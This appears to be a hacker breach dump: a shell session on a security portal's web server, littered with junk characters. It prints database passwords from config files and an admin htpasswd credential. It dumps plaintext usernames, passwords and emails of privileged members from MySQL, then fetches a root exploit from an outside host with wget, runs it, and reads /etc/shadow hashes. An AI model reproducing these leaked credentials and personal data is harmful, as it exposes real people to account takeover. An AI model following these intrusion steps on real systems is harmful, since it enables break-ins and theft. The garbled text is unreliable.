drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
2 J! C4 a5 [; d7 C! C+ _# ydrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
7 ~/ k- |, f! O0 O/ }drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
4 s& k" S) b T- sdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql! p( g+ [, n, R2 i
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com0 p+ O; R+ P1 o: C$ H! `
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
% S m4 T( _- \' Bdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner; C Y9 t% }6 x6 l8 T% W" T* U
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
4 P3 \! X% A& J8 R2 Y! i( |drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config" u! _( a! b. Z: ?* m
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron/ D, j1 D2 S7 F" ~1 u
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd# l1 C C+ M3 t5 v) f' w% _ b
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php" z8 j5 y5 `4 N2 H0 J
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico. k% F. S1 H6 y# _
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
0 c) A, g6 C1 l1 g/ K( b( b4 ~drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour' b% Z2 v0 A# q V- O) q6 `# f
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess# O* w9 u' k$ E A- E
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess4 E% Y& y ^" ], Q+ k l: k
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php0 O. [; g. K5 o8 K/ z* j
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html+ O; U6 j9 Y, |7 f4 A
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php/ t3 k2 l. D1 u2 r* ]7 C. ~8 y
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
/ q. S& s |/ M7 d1 p3 J: D( J ?-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
2 T Q# X' l* W0 k. S3 d) ]4 fdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
% [, j7 ]7 q. y5 Wdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
3 e* O, v! `4 @. O- q* ndrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib& `% ^& z% l2 x' ^- l' U
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
P! Y* S" ^* T% Q( J" ydrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member, Z; H( \. G- B- m$ {
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
8 Z$ g, ?+ |9 f" t) |* Vdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new1 @2 N9 d4 t$ o% I/ j
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf6 I1 J. a: _2 T: Q* x+ j
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re2 ], y$ B6 n. ]. c$ x
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt; d; v6 w! n/ ^5 h+ [
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss, b) h2 C; J; o% U% k. o
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
& j- q) b# |( p6 Z6 _ }drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com( R5 ]5 A! V+ S( T# g5 F
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
! `, Q1 F# |& b u# jdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
& g) a8 e B* Y( i8 E: j1 Ldrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl4 k' l9 a* d1 f2 V$ L/ x' U9 `
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
, Y5 [3 D& W8 Pdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
- v4 c, k$ f* s, L: e-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
8 Z4 }( a. ?# Tdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
9 a- U3 P6 B9 s, i% j# a# }: e& n* @7 U$ H3 b# t
sh-3.2$ head -20 index.php! x% d; J& G: O
<?PHP: R: D5 M+ D( y7 @. q: ?, D
/**- [+ P# w! H6 _: t- w1 L+ t: a
* Mainfile (external) for astalavistaNET v2.0% U$ I2 J- b* v0 d1 W' X' Y
*
( ]- G+ `7 Y+ @) I" s* @copyright Astalavista IT Engineering GmbH
+ R. N2 I& y) T. }! `& D: A' j* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
7 A& P4 w7 H* _) G* @version 1.06 b" N9 d7 q* _, t" k
*/- ^9 ~0 a7 k1 [+ i6 J
7 N" O3 @; Y, Z, g" ? if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
2 ]$ v+ e6 z2 C) e, Y0 g- v $dontStartSession = false;
6 f# a; j. J9 H D1 a+ P/ U. R } else {
' |- A; J3 O0 _4 k $dontStartSession = true;
0 z+ c0 h8 u3 h, b }
- \( B; J8 |8 ^# Y7 b require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
3 E' f: a& d; G5 q' F1 M require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
$ i r+ I, V1 g8 P+ a7 M) ?0 o require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);! Z e( S2 {2 [ F
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
2 f* S) x% s* y6 f
' g0 O6 x, Y m* }sh-3.2$ cd config, q9 i$ \" n3 r1 j+ R) v
sh-3.2$ ls -la
! K4 W) ^* t+ q, O: B: i. C2 V+ `- Ytotal 32" ?" p S6 M* T/ T5 f
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .4 V. ]" I, C R
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. {: v: D4 V$ @& Q
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php& I& Y. Y+ [! p' g5 m2 i
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php+ h k, E5 i( O" [: H' {# I
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php; e+ s' m; J% l9 r; d1 X3 c
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
$ B2 _4 l2 `& T) h-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php0 g/ G* [/ B4 `! l: S. X4 W- e; J$ S6 `
' C D0 I0 F5 t- a7 ?. _% nsh-3.2$ cat com.conf.php3 G! ]7 P& E1 ^
[snip]8 p6 b$ B$ y! O5 T c9 J
//member-database7 F' K7 p' f& V, L8 K
$_CONFIG['db_mem_server'] = ‘localhost’;
/ X& J9 a+ J' o; e$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
& @7 q% g" _6 I1 u- D( L9 V( j$_CONFIG['db_mem_user'] = ‘astanet_db’;. }& E: S$ U0 U1 y9 l
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 O# }' P' L! p. L1 V3 l! m+ v
$_CONFIG['db_mem_debug'] = false; //true or false
' E; c) f* Y! o3 v//ads-database6 R6 s( w* \2 Z( B' f! F2 x
$_CONFIG['db_ads_server'] = ‘localhost’;
' a( N" p$ ~- F" J" l, ?- {# }$_CONFIG['db_ads_database'] = ‘astanet_ads’;$ ?% g3 N' Z" S# l8 I3 Y6 g
$_CONFIG['db_ads_user'] = ‘astanet_db’;
' q+ s: W3 ?. D( l7 W, a$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;% n* W# v" f! A2 i3 d7 v
$_CONFIG['db_ads_debug'] = false; //true or false
3 G% {( l: n4 U# X i8 g0 q//rainbow-database2 j& R, i$ M, e# D' U8 f
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;4 u8 q, @* b$ J3 V) K
$_CONFIG['db_rainbow_database'] = ‘rainbow’;* F+ p4 P) b$ { n
$_CONFIG['db_rainbow_user'] = ‘dinu’;
j2 W1 g- m. ]& ~/ m$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
; N, _* }( Z' q$_CONFIG['db_rainbow_debug'] = false; //true or false* A6 V! l$ Z: D/ H
//mailing lists database
+ j0 \6 t) \- Z% E& g! @0 M$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
, y& Q5 E% w f4 A$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;, x/ a1 d0 [8 H
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
2 J' N+ ^8 ?3 D6 H% T$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$ h+ {+ s# D2 d$_CONFIG['db_mailing_lists_debug'] = false; //true or false
2 V) k+ B1 C# e% g: Z, A' G//paypal
3 E4 w8 ^) u( Z9 M$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% Q N) E& n4 g3 K& K
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;1 R. {2 M0 J; a- R# S, x1 y# P
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;+ v5 W0 r2 g* B. M7 A7 @& ?
$_CONFIG['sub_pp_noship'] = ‘1′;
8 I0 D% b% R2 }) Y [; r( k7 m; X$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;: T" {# U, m8 ]! y- g( |
[snip]4 T% t' t* [4 Q
7 q& U W7 o |- ^ A9 j7 Z: N5 C
sh-3.2$ cd ..3 n: L) |7 F0 H
sh-3.2$ cd member$ H; t% v+ n/ `% q& l- n4 e; d. K
sh-3.2$ ls -la
" L8 H/ g6 n8 T- v$ atotal 20 N* I: Z' z& C( V5 n8 G
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
( a8 c0 B. m! z; T: [drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., ^( J6 t, o8 {4 g6 K
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
! i- t; e( l0 @# |6 ^# Q& Z-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php) \" F6 @. G; E" h/ f# ?9 P9 K
sh-3.2$ cat .htaccess4 g4 Q- w1 H9 S7 B$ T6 c
SecFilterEngine off
' N9 O0 k" s o( j- K+ Z) B) V! W( P N
sh-3.2$ cd ..6 }' |2 ~: s+ K$ z* P' _" h
sh-3.2$ cd cron. r" ^9 K, x1 F% ^
sh-3.2$ ls -la" w) ~- |, t# N, z8 h& Z) m2 ?
total 168
* P5 W% |5 \- m* C+ ?& Edrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
/ j" t: k1 \1 {0 pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: V8 O4 ]4 M' y- D1 T7 x; y-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
' l' @2 x: y! p; Z0 h$ o-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
1 `$ I, S$ _1 C4 g( _- f-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
: q* L3 i$ s1 V) D- b5 w-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
6 O" n4 u( P0 u. e/ k% ?* C-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php9 v8 I, E0 ]' W4 W, e
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
) _, k: H+ [; Z6 w-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 e/ D! c0 {8 i! [) s! n-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
- Q0 Y8 N8 L; }; v9 I+ I-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
5 G3 Q5 S* {0 @( C: v-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
4 f ~, |7 W1 U; A9 H1 S S-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
3 B! m6 q9 d& ~-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php% F: p" \: L/ G6 G' O& j, G
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
/ Y) i+ t7 V0 u, z-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
5 p) K8 Z: Z' @-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php* N. j# \* T1 s$ ^3 s6 B: t
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
. ~! Q* x8 ^/ S% V' Z: D: l Q-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
9 z Q6 @9 O% L* X-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php- [: z; i% s* @7 p. H& }6 O0 M
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
6 n( F- T3 \6 A+ ~-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php& O& I+ O5 N/ X
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
6 S7 X& q7 f" Y% p& h( a, f% S6 v; d7 \! `* |7 z
sh-3.2$ cd ..: O5 ?' Q" P' G# n& V
sh-3.2$ cd _007
6 u! z- m$ G U1 a6 x' A# jsh-3.2$ ls -la0 L- f$ ~5 m+ Y' O; w
total 24. t. Z) v' ^! q
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ./ w5 B8 b% _" y* j" ]
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ g2 Z7 s( @( F. K0 S1 o6 X4 F
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess/ i+ \" @4 b3 L) p& w
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
& k3 v- `0 n4 X& \9 ~2 l$ m$ z-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php) T( g/ j6 o. @* w% d; w& z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap& P0 `$ ] y# J x, b& \4 c
- o; J1 P7 W6 C6 wsh-3.2$ cat .htaccess
9 N# k G" V o" RauthType Basic/ B5 l. h# u& ^& D M
authName Admin
/ I! j: @1 _4 I! {authUserFile /home/astanet/auth/.htadm_pwd
+ @ T7 I7 }$ v& t5 N( brequire valid-user7 b) X+ C3 u# F. l( [
) V+ H% L2 `2 C6 A' w- Q. M1 Msh-3.2$ cat /home/astanet/auth/.htadm_pwd
9 R$ |7 `4 Z% r' A2 @" dadmin2net:CR0bl65MwhfT
. x; u* l: D2 n8 n1 W( {3 r; f( w, F: u, T& \; d! X! n) B
sh-3.2$ mysql -u astanet_db -p8 O7 J, B1 n1 Z/ @4 Y9 e
Enter password: i! I- y7 O- ]$ D) J6 J
Welcome to the MySQL monitor. Commands end with ; or \g.
3 g' c" n) @7 ~& W9 oYour MySQL connection id is 275153
7 j! M3 e+ \, B+ q9 q% jServer version: 5.0.45-community-log MySQL Community Edition (GPL)8 P t8 T: G0 ], l r
5 B& X: a O7 ~0 d2 j
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. V) M( \' v/ I
: F# X1 f, s. l( g6 X# @' t3 D$ }3 ~- l( omysql> show databases;5 u0 V3 p2 l0 v# W9 z6 ^
+———————–+8 W4 J/ P+ \# y5 y2 T2 g4 D6 Q7 }1 Z
| Database |
1 s4 ?! l3 @7 F. ?( s( o9 f& f ^+———————–+0 u8 ^ S" Y( X' p- Y4 ~' f) g
| information_schema |
% d0 a& D$ V7 I) Y, R3 V, N6 H| astanet_ads |3 q. h" l6 N' A6 ? w/ p
| astanet_mailing_lists |
4 h( m4 f7 T3 f; P t: q8 e| astanet_mediawiki |1 P L* `0 B* ^. G& p9 M' x* {
| astanet_membersystem |
3 y: x; R0 O, i w5 z6 L| test |
% Y1 p# k4 m, R6 g/ d+———————–+
; \9 A7 z0 M; n. V% f6 rows in set (0.00 sec)
) {; ]/ i/ l" E" E* v, v- C: S- {/ ^
mysql> use astanet_membersystem
2 |4 z3 Q. L3 L9 R$ SDatabase changed, [) e( o1 ?# e- [
mysql> show tables;
k/ v& c) S+ H" W7 t; {' y5 t+———————————–+
) |, [( J- i" w; Y, M| Tables_in_astanet_membersystem |
; f7 `! G; R: E! [$ j" `. T+———————————–+
; k! k3 U; b3 x; j3 M& u9 N| blacklist_categories |5 |, F+ ~3 ] k4 j. B
| blacklist_content |
0 C0 s% I4 J4 o4 O| blacklist_levels |
8 p c+ @8 C5 }& b, C| blacklist_mcset |
, ?6 B# U! b0 t* O. ^4 J* t: D| dir_categories |
I" Q& N2 J, ]+ A8 H f* z| dir_comments |' X: n5 z/ Q8 s# h# ~: C
| dir_links |
( ~) R' }6 l) O) O+ i| dir_temp |
5 K: o; B# N0 X/ S# u, x0 I% G| dir_votes |) h- d% Y; R. @. R" k
| documents |
. {5 r' T/ ?6 W' r, t| documents_categories |
" b# K8 @! X* E" E* h| email_content |
h/ x, @: ~/ m5 @0 i F0 `" J b| email_settings |1 U8 w* Q6 G" }$ i7 _
| exploits |3 S% o4 k1 D% P0 g9 ^4 \' P
| exploits_categories |" x- L+ K+ G1 n* H ?, M% a. ~/ d
| exploittree_categories |% }6 f; C, l2 e% I8 t
| exploittree_exploits |
) R0 P; H2 R0 B8 N: l: t* T| home_values | Q# o$ U9 C; \1 A
| iso_countries |' S4 Z7 h* ~( `8 `# k
| links_categories |
% M9 n/ T& N9 T* `: y% K Q| links_records |
5 v, n) \4 F" q| links_unauth |3 U4 t$ i m( o0 o9 h7 c
| links_votes |4 Y7 F( \ t* r+ g* N1 g3 ?: T
| log |
# q1 L- W0 S5 J& W! O% [% q' p8 z6 j| news_categories |
/ B3 O' Y/ h8 C| news_comments |7 A, f% X+ ]/ y% v
| news_emoticons |0 f0 ]# S% k3 n# H2 f; A4 ]. }8 ]
| news_latest |5 R: q5 ^- h* I3 S N4 s+ H' X
| news_messages |+ I. \/ ?, {! F: ?
| news_statistics |/ n% Z. ~: J2 e ?+ l% l6 G
| news_votes |5 C7 p9 c7 j; y+ v
| prices_content |
6 A8 `6 @. Y; n, u5 r: U| prices_offers |5 t. U1 e6 x/ E( K! G" j/ y& U
| rss_settings |: y+ s+ g8 J/ P% @% F P" p0 {% Q8 n
| sessions |' d! c) [: q9 n4 t
| stats_signups |) [0 k* r$ w% j: U
| u2u2 |
1 Q, w" i; N+ w% O$ e0 T| u2u_contact |
+ K- b% g' E# Y. u* l! t| u2u_settings |' g. s3 L) u7 G: D( g) d8 X
| user_keywords_selected_categories |
" Q% y' K c9 \% u' S9 k* w0 X| users |
7 b$ |0 }- i8 G4 x% n! h| users_ipn_test |
s1 j% W9 N9 m; Y( l* I. V `' W| users_keyword_values |5 D- x, t) r4 H9 [+ ?2 P& B
| users_profile |
% c3 e5 q/ ^8 {5 r. k/ @1 w: a6 A| users_temp |% ^: i- p9 t S1 V5 g0 p# e
| users_upgrade |" s( @ |6 f4 Y7 x3 r4 Q
+———————————–+
) R7 u! T7 x; t3 J46 rows in set (0.00 sec)
1 b( |" b$ \9 d
" ^2 z: y' Z+ k7 u( wmysql> describe users;
$ y) v+ w1 i* W# `, W# s+————————–+————————————–+——+—–+———————+—————-+
$ k! n+ B+ t9 V9 `| Field | Type | Null | Key | Default | Extra |
. ~: Y2 Y0 r' y3 w' k2 v+————————–+————————————–+——+—–+———————+—————-+0 {4 H! ]" u1 H4 I
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |; R4 s G4 R: {* ?0 f3 H& Z1 |; ]+ `
| user | varchar(50) | NO | | | |& _( g+ g1 E7 C/ j3 f i8 N
| nickname | varchar(30) | NO | MUL | anonymous | |
- p, a: q% t( K* `( Z| password | varchar(30) | NO | | | |1 c' G# G2 u4 g& S, C, H
| userlevel | tinyint(3) | YES | MUL | NULL | |
]4 t4 t1 f' B% S| exp | int(8) unsigned | NO | | 0 | |) f& K3 ~' M4 \" J: }" E' P
| email | varchar(50) | NO | | | |
! ]" x" K3 S' o" {| ip | varchar(15) | NO | | 0 | |- A( S6 X, c, W# N! ?; [% i' [
| proxy | set(’0′,’1′) | NO | | 0 | |
" G" }7 N# E1 N+ f| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |7 M5 B6 F$ u( l$ x
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
2 ?% a1 u( f1 R- I3 t| anz_in | tinyint(1) | NO | | -1 | |
- J2 K$ o7 w8 O' z" B| status | tinyint(1) unsigned | NO | | 0 | |! C+ Q/ m& w4 U% S9 n
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
3 R) T' ?+ v) R# D Z3 t| freemember | set(’0′,’1′) | NO | | 0 | |& R: L/ F/ t) x2 Z; P* C& j5 b2 b
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |' j, z3 F6 {/ P: c' C0 f
| lang | tinytext | NO | | | |1 e: C. n9 M+ q* B# S
| adid | smallint(6) | NO | | 0 | |
& L0 q) F3 `9 e3 t+ w| pp_txn_id | varchar(255) | YES | | NULL | |
) v( [8 ~0 \0 b| cnb_transaction_id | varchar(255) | YES | | NULL | |) A& C2 }1 F: e& V: i# F+ Z
| cnb_order_id | varchar(255) | YES | | NULL | |( P5 k! s1 |1 f3 Y
| cnb_user_id | int(11) | YES | | 0 | |+ I. W4 Q3 R! h, G
+————————–+————————————–+——+—–+———————+—————-+
4 Q( m+ M" J; Z6 G* t22 rows in set (0.01 sec)0 P( ^4 ]" @/ F5 P( G
$ Z& R* a3 z6 |5 q+ D* H3 |
mysql> select count(*) as skids from users;
* c) m e$ V& f/ Z; K+ H- s+——-+( t" d5 S0 H2 o- E2 D' A3 e
| skids |1 I" ^$ o- F) s' v7 X" a2 W" Z
+——-+7 B1 l f+ n, [5 g6 D6 L
| 25199 |% C" Y G. ?5 I" d) q
+——-+
P' K9 h& F# u% Q$ P: ]1 row in set (0.00 sec)
+ T: w$ _) C2 [0 k
8 [5 W" l3 g; d& Mmysql> select user,nickname,password,email from users where userlevel = 1;
z( A" k+ g* f) l8 _+————————–+———————-+——————+———————————–+
( k: k0 d6 x+ }| user | nickname | password | email |
: G! [$ @2 C0 t! @+————————–+———————-+——————+———————————–+
9 d" a+ x3 z$ Z0 o! e4 L| pascal | prozac | astaman3 | 链接标记info@astalavista.net |2 b5 j, u2 Q, t9 ?: u
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |5 p" ?7 Y: f0 F
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
4 O& S9 R# ~6 [! W| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |! P. l; @: u" [
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
; t9 ~& d2 J- N| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
+ z: y; M6 t/ \9 ?| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
. u ~$ I+ `5 c! G L$ z| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |% W# P: B4 H! }
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
& u e* i7 F& J7 }1 @6 V| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
* ^( l$ E9 K8 T0 ?| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |# [# B% j3 b! I. g: n) }3 M
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
" k. o" Q7 Z- \% }! N| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |: a1 d# @9 d: K5 f7 ]" A+ |
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |2 w! [; P! a; ?7 D. ~' ?+ w
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
" N- ]8 p# j' K2 C0 r7 M| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |' ?; p' F. O/ ^! O) l F: W
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |; N5 A7 ~0 Q% _* x3 I
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
C) ]' L1 ?4 W7 ]9 P7 c| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |: |6 D0 ]4 w. {- g! j
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |7 e% G% y- K( D# v1 i' C; S9 N' O1 H/ e1 m
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |; g" Q8 E4 G! D# U' J l- A8 i
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |/ Z( S1 e7 i5 _
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
* i/ P6 n& ?4 E4 | ]| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
. `6 @) @0 ?$ s9 d| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
6 u7 p+ i* x1 M0 ~0 @2 ?/ R| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
/ y4 _9 r! }9 m, h/ Y. [! W& A8 d| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |5 b5 I' @. L0 `; |
+————————–+———————-+——————+———————————–+0 T5 f9 }6 d0 R# H J
27 rows in set (0.00 sec)3 h# N$ n7 E8 Y) Y" y
( i n. B9 F+ Z, J+ Z& ]* g& fmysql> exit;0 p2 @6 E4 }: C4 I! Y+ {' m
Bye
& O+ d9 U8 e, V2 \
1 B5 c$ C3 }+ N. C9 _& Q. o- g[~] plaintext passwords? yes,0 Y/ T, h3 G8 s3 H1 w
Those so called “security professionals” who charge you $6.66 / month to
) v$ a* i( R7 w$ D) |register at their hack-proof portal, save your passwords in plaintext…% `$ `; c( L! q b' w
brilliant!$ d0 O6 Q- C+ t+ S. x3 t+ l
. l/ C% L+ W x% J2 |; d# B5 _[~] This been fun but we want more.
a7 i8 h) }, w# j8 j$ S* i, b! W
0 [: R( H9 _4 Rsh-3.2$ uname -a }1 p4 Q2 |; o& q1 Y! x
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux9 v3 k8 I* R0 F0 Z
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]0 \5 l& s; T9 o
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
2 t0 ]/ r4 r# NResolving anti.sec.labs… 13.33.33.37' A4 _8 P" h5 F c& Q1 Z8 C b
Connecting to anti.sec.labs|13.33.33.37|:80… connected.8 k7 U) c$ K q3 K7 f6 n
HTTP request sent, awaiting response… 200 OK
/ F0 @. \* h% U- W2 G sLength: 18200 (18K) [text/plain]& c3 o" o% l$ E! ] P9 g# t6 z
Saving to: `g0troot’" c6 ]2 W0 q- f$ l4 ~& v4 L" N
' ^7 u% w" p$ J9 L- D
100%[=========================================================================================================================================>] 18,200 58.6K/s in1 G* A' \& c+ O/ Q8 ?+ K# O
0.3s
( U& K1 |& }5 [) c
& S3 c: v+ ]* {$ W18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
1 J5 U0 ?7 \6 z. H+ k x7 o5 O M6 }3 F; y" v
sh-3.2$ ./g0troot -i x86_640 }# e0 [9 ?0 ?, C
[+] g0troot - anti.sec.labs
; l3 L2 b3 y5 L9 Q) f$ n4 P[+] Target: 2.6.18-128.1.10.el5
: Q! \' t% c% J+ `: K- c2 A* H[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]) \! A0 h" G ^, ]# |( v
1 \4 z1 f/ y3 {: C
[+] r00tr00t
9 o/ r" E9 ]4 u/ j$ X[~] Executing shell…
: D- {' V9 L$ E% T& b6 J1 @# C1 _! C l- v# [* a! J. J* [5 H$ @
sh-3.2# id
8 Y9 N3 ^6 H F+ z% o2 Guid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
. }5 f* o+ j b) A$ g
1 k5 \' [) S F* U9 c/ D1 Ush-3.2# cat /etc/shadow
; |; V! q; X4 _. e; q( K# R5 q) @( {root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::" D9 s: `9 B: t8 ?
[snip]
. E% ]0 w! K! e$ `, K( sadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
! w+ x) Z/ g4 @4 E! g# u, ^jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
